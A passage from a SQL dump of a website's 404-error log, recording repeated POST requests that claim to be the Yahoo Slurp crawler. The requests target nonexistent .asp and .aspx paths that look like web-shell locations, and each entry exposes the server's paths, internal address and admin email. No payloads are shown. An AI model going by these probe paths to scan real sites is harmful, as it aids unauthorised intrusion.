Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.195.14.91\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.195.14.91\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/stat/images/show.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/stat/images/show.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0AP5cHc@dX2BdZ47DTAAAAAo\";s:12:\"REDIRECT_URL\";s:22:\"/stat/images/show.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56042\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/stat/images/show.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/stat/images/show.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0AP5cHc@dX2BdZ47DTAAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927041.0053\";s:12:\"REQUEST_TIME\";s:10:\"1571927041\";}}','notice','2019-10-24 14:24:04','2019-10-24 14:24:01',35338888,37143976,'http://bintara.com.my//stat/images/show.ashx',1,0,'222.195.14.91'),(28914,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//stat/images/show.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.23.26.152\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.23.26.152\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/stat/images/show.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/stat/images/show.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGz7kq-QPicCh3WFsYbowAAAJE\";s:12:\"REDIRECT_URL\";s:22:\"/stat/images/show.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55460\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/stat/images/show.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/stat/images/show.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGz7kq-QPicCh3WFsYbowAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927022.3325\";s:12:\"REQUEST_TIME\";s:10:\"1571927022\";}}','notice','2019-10-24 14:23:44','2019-10-24 14:23:42',35267168,37072040,'http://bintara.com.my//stat/images/show.ashx',1,0,'222.23.26.152'),(28913,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//templates/main/a.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.79.236.23\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.79.236.23\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/templates/main/a.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/templates/main/a.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGz4kq-QPicCh3WFsYbmwAAAJA\";s:12:\"REDIRECT_URL\";s:22:\"/templates/main/a.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55460\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/templates/main/a.aspx\";s:10:\"SCRIPT_URL\";s:22:\"/templates/main/a.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGz4kq-QPicCh3WFsYbmwAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927010.1442\";s:12:\"REQUEST_TIME\";s:10:\"1571927010\";}}','notice','2019-10-24 14:23:31','2019-10-24 14:23:30',35271328,37071016,'http://bintara.com.my//templates/main/a.aspx',1,0,'59.79.236.23'),(28912,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//list/indexl.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.234.187.247\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.234.187.247\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/list/indexl.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/list/indexl.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGz1f5cHc@dX2BdZ47DOgAAABY\";s:12:\"REDIRECT_URL\";s:16:\"/list/indexl.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/list/indexl.asp\";s:10:\"SCRIPT_URL\";s:16:\"/list/indexl.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGz1f5cHc@dX2BdZ47DOgAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926997.9957\";s:12:\"REQUEST_TIME\";s:10:\"1571926997\";}}','notice','2019-10-24 14:23:19','2019-10-24 14:23:18',35268224,37078896,'http://bintara.com.my//list/indexl.asp',1,0,'61.234.187.247'),(28911,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//list/indexl.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.151.100.115\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.151.100.115\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/list/indexl.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/list/indexl.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGz0v5cHc@dX2BdZ47DNwAAAAM\";s:12:\"REDIRECT_URL\";s:16:\"/list/indexl.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/list/indexl.asp\";s:10:\"SCRIPT_URL\";s:16:\"/list/indexl.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGz0v5cHc@dX2BdZ47DNwAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571926995.08\";s:12:\"REQUEST_TIME\";s:10:\"1571926995\";}}','notice','2019-10-24 14:23:17','2019-10-24 14:23:15',35347232,37142400,'http://bintara.com.my//list/indexl.asp',1,0,'211.151.100.115'),(28910,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//images/text/check.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.194.163.77\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.194.163.77\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/images/text/check.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/images/text/check.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzqEq-QPicCh3WFsYbcgAAAII\";s:12:\"REDIRECT_URL\";s:22:\"/images/text/check.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/images/text/check.asp\";s:10:\"SCRIPT_URL\";s:22:\"/images/text/check.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzqEq-QPicCh3WFsYbcgAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926952.6391\";s:12:\"REQUEST_TIME\";s:10:\"1571926952\";}}','notice','2019-10-24 14:22:34','2019-10-24 14:22:33',35269936,37066992,'http://bintara.com.my//images/text/check.asp',1,0,'218.194.163.77'),(28909,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//include/wocao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.176.30.68\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.176.30.68\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/include/wocao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/include/wocao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzeP5cHc@dX2BdZ47DAQAAAA0\";s:12:\"REDIRECT_URL\";s:18:\"/include/wocao.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/include/wocao.asp\";s:10:\"SCRIPT_URL\";s:18:\"/include/wocao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzeP5cHc@dX2BdZ47DAQAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926904.5805\";s:12:\"REQUEST_TIME\";s:10:\"1571926904\";}}','notice','2019-10-24 14:21:47','2019-10-24 14:21:45',35340088,37151632,'http://bintara.com.my//include/wocao.asp',1,0,'61.176.30.68'),(28908,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Netsys/Comm/ye.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"121.55.4.179\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"121.55.4.179\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Netsys/Comm/ye.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzZ0q-QPicCh3WFsYbQAAAAJQ\";s:12:\"REDIRECT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52750\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Netsys/Comm/ye.asp\";s:10:\"SCRIPT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzZ0q-QPicCh3WFsYbQAAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926887.5814\";s:12:\"REQUEST_TIME\";s:10:\"1571926887\";}}','notice','2019-10-24 14:21:29','2019-10-24 14:21:28',35265472,37064160,'http://bintara.com.my//Netsys/Comm/ye.asp',1,0,'121.55.4.179'),(28907,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Netsys/Comm/ye.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.205.239.123\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.205.239.123\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Netsys/Comm/ye.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzXu0MT698oQwhBK9dfQAAAQU\";s:12:\"REDIRECT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Netsys/Comm/ye.asp\";s:10:\"SCRIPT_URL\";s:19:\"/Netsys/Comm/ye.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzXu0MT698oQwhBK9dfQAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926878.4282\";s:12:\"REQUEST_TIME\";s:10:\"1571926878\";}}','notice','2019-10-24 14:21:21','2019-10-24 14:21:18',35337624,37128976,'http://bintara.com.my//Netsys/Comm/ye.asp',1,0,'218.205.239.123'),(28906,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//admin/image/Sql.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 